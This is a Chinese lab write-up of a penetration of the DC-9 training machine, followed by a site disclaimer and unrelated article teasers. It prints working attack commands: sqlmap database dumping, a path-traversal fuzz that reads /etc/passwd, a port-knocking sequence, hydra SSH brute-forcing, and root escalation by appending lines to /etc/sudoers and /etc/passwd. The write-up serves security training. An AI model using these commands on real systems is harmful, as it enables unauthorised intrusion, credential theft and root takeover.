【DC-9靶场渗透】

文章目录

前言

一、确定靶机地址

二、信息收集

三、寻找漏洞

四、进一步漏洞挖掘

五、关键文件

六、ssh爆破

七、提权

总结


前言

马上过年了,年前再做一下DC靶场最后一个靶机。


一、确定靶机地址

1、可使用arp-scan命令

靶机地址为:172.16.100.109

二、信息收集

1、nmap探测开放端口及服务

开放了80端口,22端口为filtered状态,可能有防火墙也可能关闭。

2、访问http服务

三、寻找漏洞

此页面有许多用户名,和地址栏显示.php说明这个网页大概率是用PHP编写

注意到这里有个search.php,并且有个搜索框,可能是POST提交方式,抓一下包,看看能不嫩sql注入

可以看到参数search很可能存在sql注入,直接用sqlmap扫描

sqlmap -r search -p search --batch --dbs
sqlmap -r search -p search --batch -D "users" -T "UserDetails" -C "id,username,password" --dump

最后查看到users表中的数据

我们可以将文件内容分割 出来,形成用户名和密码字典。

同时查看另一个数据库Staff

同样在users表中发现了数据,是admin的账户和密码hash值,用MD5破解一下

得到账户密码:admin/transorbital1

但是尝试ssh登录失败。

四、进一步漏洞挖掘

使用admin账户登录页面,但是提示页面不存在,猜测是否有文件包含漏洞

尝试使用fuzz模糊测试,测试参数找到/etc/passwd文件,此处需要网站的cookie,登录网站抓包即可获取

wfuzz -b 'PHPSESSID=nfhibu50l40lmh7g4p989k5u0s' -w /usr/share/wfuzz/wordlist/general/common.txt --hw 100  http://172.16.100.112/manage.php?FUZZ=../../../../etc/passwd

可以看到参数为file,尝试访问一下

五、关键文件

关于knockd服务

但是最关键的文件在本地文件并不常见,那就是/etc/knockd.conf文件,这个文件是配置好端口敲门服务后产生的,关于端口敲门,有如下说明:

如果你有一台公众可访问的服务器,黑客可以轻松扫描其IP地址,查找服务器上的开放端口(尤其是用于SSH的端口22)。将服务器隐藏起来、不让黑客看见的一种方法是使用knockd。knockd是一种端口试探服务器工具。它侦听以太网或其他可用接口上的所有流量,等待特殊序列的端口命中(port-hit)。telnet或Putty等客户软件通过向服务器上的端口发送TCP或数据包来启动端口命中。

端口敲门服务,即:knockd服务。该服务通过动态的添加iptables规则来隐藏系统开启的服务,使用自定义的一系列序列号来“敲门”,使系统开启需要访问的服务端口,才能对外访问。不使用时,再使用自定义的序列号来“关门”,将端口关闭,不对外监听。进一步提升了服务和系统的安全性。

换句话说,如果知道自定义的端口,逐个进行敲门,这样我们就能够开启SSH端口,从而进行连接,所以利用文件包含漏洞来查看knock.conf文件配置,得到自定义端口。

输入/proc/sched_debug查看靶机的任务调用情况,发现开启了knockd服务

输入/etc/knockd.conf,得到敲门端口的顺序

nmap -p 7469 172.16.100.112
nmap -p 8475 172.16.100.112
nmap -p 9842 172.16.100.112

再探测一下端口

这里尝试几次不行可以重启靶机,前后IP有变化不用在意

六、ssh爆破

前面我们利用搜集的信息已经形成了用户名和密码字典,使用hydra工具进行登陆测试

hydra -L users -P password 172.16.100.113 ssh

发现有三个用户可以ssh登录

后续我们可以都登陆一下,查看各自账户里的文件信息

最终对比发现,janitor用户有一个密码.txt 

我们将密码内容复制到之前的密码本中,再次进行爆破尝试

发现一个新用户可以ssh登录

使用新用户进行登录

七、提权

查看sudo可以执行的命令,发现可以不用密码执行一个test文件

运行这个文件提示使用python test.py带参数执行

找一下这个文件

进入文件查看内容,分析代码可知这个文件的功能是读取文件1的内容然后写入到文件2

这里提供两种提权方法:

方法一:写一个授权文件,fredf用户可以在all地方以root不需密码执行all命令

方法二:使用Openssl构造加密密码,构造新用户admin为root权限

方法一:

echo "fredf ALL=(root) NOPASSWD:ALL" >> /tmp/sudo.txt
sudo /opt/devstuff/dist/test/test  /tmp/sudo.txt /etc/sudoers

尝试切换到root

提权成功

方法二:

利用openssl创建密码,创建后参照/etc/passwd中格式写入文本中

openssl passwd -1 -salt admin 123456 
echo 'admin:$1$admin$LClYcRe.ee8dQwgrFc5nz.:0:0::/root:/bin/bash' >> /tmp/passwd

执行

sudo  /opt/devstuff/dist/test/test /tmp/passwd /etc/passwd
cat /etc/passwd

su命令切换用户

提权成功。


总结

这次打靶机过程中主要难点是端口为filtered状态时,不知道有knockd服务。需要得知到knockd服务的知识,查找路径,利用knockd连接到ssh。

knockd 服务 默认路径:/etc/knockd.conf ,后续可以了解一下。

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/671437.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

C语言---------对操作符的进一步认识

操作符中有⼀些操作符和⼆进制有关系,我们先学习了⼀下⼆进制的和进制转换的知识。 1.原码、反码和补码。 有符号整数的三种表⽰⽅法均有符号位和数值位两部分, 2进制序列中,最⾼位的1位是被当做符号位,剩余的都是数值位。 符号…

GDB调试命令大全

GDB调试命令大全 启动运行设置/查看断点(breakpoint)设置/查看观察点(watchpoint)设置/查看捕捉点(catchpoint)维护停止点维护条件停止点停止点设置运行命令断点菜单恢复程序运行和单步调试信号产生信号量线程 转载自: https://www.cnblogs.com/gqtcgq/p/7511974.h…

树的三种遍历方式-算法

题目 树的三种遍历方式&#xff0c;前序&#xff0c;中序&#xff0c;后续 解题 通过递归 public static List<Integer> preorderTraversal(TreeNode treeNode) {List<Integer> result new ArrayList<>();if (treeNode null) {return result;}List<…

python coding with ChatGPT 打卡第18天| 二叉树:从中序与后序遍历序列构造二叉树、最大二叉树

相关推荐 python coding with ChatGPT 打卡第12天| 二叉树&#xff1a;理论基础 python coding with ChatGPT 打卡第13天| 二叉树的深度优先遍历 python coding with ChatGPT 打卡第14天| 二叉树的广度优先遍历 python coding with ChatGPT 打卡第15天| 二叉树&#xff1a;翻转…

【Spring基础】从0开始学习Spring(2)

前言 在上篇文章&#xff0c;我已经讲了Spring中最核心的知识点&#xff1a;IoC&#xff08;控制反转&#xff09;以及DI&#xff08;依赖注入&#xff09;。这篇文章&#xff0c;我将讲一下关于Spring框架中的其它比较琐碎但是又还是挺重要的知识点&#xff0c;因此&#xff…

【Android-Compose】手势检测实现按下、单击、双击、长按事件,以及避免频繁单击事件的简单方法

目录&#xff1a; 1 不需要双击事件 规避频繁单击事件2 需要双击事件&#xff08;常规写法&#xff09;3 后记&#xff1a;不建议使用上面的代码自定义按钮 1 不需要双击事件 规避频繁单击事件 var firstClickTime by remember { mutableStateOf(System.currentTimeMillis()…

vue实现查询搜索框下拉字典

字典表 前端页面显示 依据这个字典表实现动态查询 初始化数组 首先先在全局变量里定义一个数据存放查询出来的数据 data() {return {dicts: []};},生命周期 查询的时候是声明周期开始的时候&#xff0c;原本增删改查页面在生命周期开始的时候就查询了页面的数据获得了列表值…

ElasticSearch-SpringBoot整合ElasticSearch

六、SpringBoot整合ElasticSearch 1、浏览官方文档 1、查找跟ES客户端相关的文档 使用Java REST Client 选择Java Hight Level REST Client 2、创建项目的准备 1.找到原生的依赖 2.找到对象 3.分析这个类里面的方法 3、正式创建项目 1.创建工程 2.导入依赖 注意依赖版本…

Python 函数式编程进阶:map、filter、reduce

Python 函数式编程进阶&#xff1a;map、filter、reduce 介绍map 函数作用和语法使用 map 函数Lambda 函数的配合应用 filter 函数作用和语法使用 filter 函数Lambda 函数的结合运用 reduce 函数作用和语法使用 reduce 函数典型应用场景 介绍 在函数式编程中&#xff0c;map、…

【QT】opcuaServer 的构建

【QT】opcuaServer 的构建 前言opcuaServer实现测试 前言 在博文【opcua】从编译文件到客户端的收发、断连、节点查询等实现 中&#xff0c;我们已经介绍了如何在QT 中创建opucaClient 。在本期的博文中&#xff0c;我们基于之前的部署环境&#xff0c;介绍一下如何构建opcuaS…

springboot与Elasticsearch版本兼容对比

首先 大家在下载 Elasticsearch 时 最好先弄清楚版本 因为 如果 Spring Boot 版本 不兼容 Elasticsearch 那就是到头一场空了 Elasticsearch 版本 6.x 可以兼容 Spring Boot 2.x Elasticsearch 版本 7.x 可以兼容 Spring Boot 2.x 3.x 4x Elasticsearch 版本 7.x 以及 8.x 可以…

Flask 入门4:Flask 模板

1. 前言 Flask 拥有丰富的扩展方法&#xff0c;且都有统一的特点&#xff1a;简单和即学即用。当我们要实现某个功能之前&#xff0c;可以提前去搜一搜这个功能包是否已经存在&#xff0c;这样也能帮助我剩下很多时间。那么要去哪里找到这些扩展包呢&#xff0c;这里推荐两个方…

MySQL重要进程

MySQL的主要进程包括以下几种&#xff1a; 1.mysqld&#xff08;也称mysqld_safe&#xff09;&#xff1a;这是MySQL服务器的守护进程。它负责接收客户端连接、处理查询并管理数据库文件等操作。可通过命令行或配置文件来指定其运行参数。 2.mysqladmin&#xff1a;用于管理M…

模拟队列(数组实现)

题目 实现一个队列&#xff0c;队列初始为空&#xff0c;支持四种操作&#xff1a; push x – 向队尾插入一个数x&#xff1b;pop – 从队头弹出一个数&#xff1b;empty – 判断队列是否为空&#xff1b;query – 查询队头元素。 现在要对队列进行M个操作&#xff0c;其中的…

5G智能卷烟工厂数字孪生可视化平台,推进烟草行业数字化转型

5G智能卷烟工厂数字孪生可视化平台&#xff0c;推进烟草行业数字化转型。随着5G技术的不断发展&#xff0c;智能卷烟工厂数字孪生可视化平台成为了推进烟草行业数字化转型的重要手段。该平台将5G技术与数字孪生技术相结合&#xff0c;实现了对卷烟生产全过程的实时监控、数据分…

JAVA面试题之四谈谈你对RPC框架的理解

面试题之四 谈谈你对RPC框架的理解 难度指数&#xff1a;4星 考察频率&#xff1a;55-60% 开发年限&#xff1a;3年以上 一.RPC是什么&#xff1f; 远程过程调用&#xff1a;Remote Procedure call.可以跨进程&#xff0c;跨越同一个计算机的多个进程、多个JVM或多台计算…

ROE是什么?如何用ROE来分析企业?

ROE是什么&#xff1f; ROE&#xff0c;即净资产收益率&#xff08;Return on Equity&#xff09;&#xff0c;又称作股东权益报酬率、权益利润率&#xff0c;是净利润与平均股东权益的百分比&#xff0c;也称为净值报酬率、权益报酬率、权益利润率、净资产利润率&#xff0c;…

Knot Server XDP原理分析

目录 Knot Server XDP原理分析一、Kernel层代码分析1. kernel层源码的编译2. bpf-kenerl.c源码的分析 二、 User层代码分析 Knot Server XDP原理分析 xdp部分的代码分为Kernel层和User层两部分&#xff0c;Kernel层代码由User层代码调用linux bpf接口加载到网卡内核驱动&#…

网络选择流程分析(首选网络类型切换流程)

首先是界面,我在此平台的界面如下: 对应的入口源码位置在Settings的UniEnabledNetworkModePreferenceController中,当然其他平台可能在PreferredNetworkModePreferenceController中,流程上都是大同小异 然后点击切换按钮会调用到UniEnabledNetworkModePreferenceControlle…

为什么说Python语法简单?

Python被广泛认为是一种语法简单、易学易用的编程语言&#xff0c;这种观点有几个关键的原因&#xff1a; 1、清晰简洁的语法结构&#xff1a; Python采用了清晰而简洁的语法结构&#xff0c;使得代码易于阅读和理解。Python的语法设计强调代码的可读性&#xff0c;采用了清晰…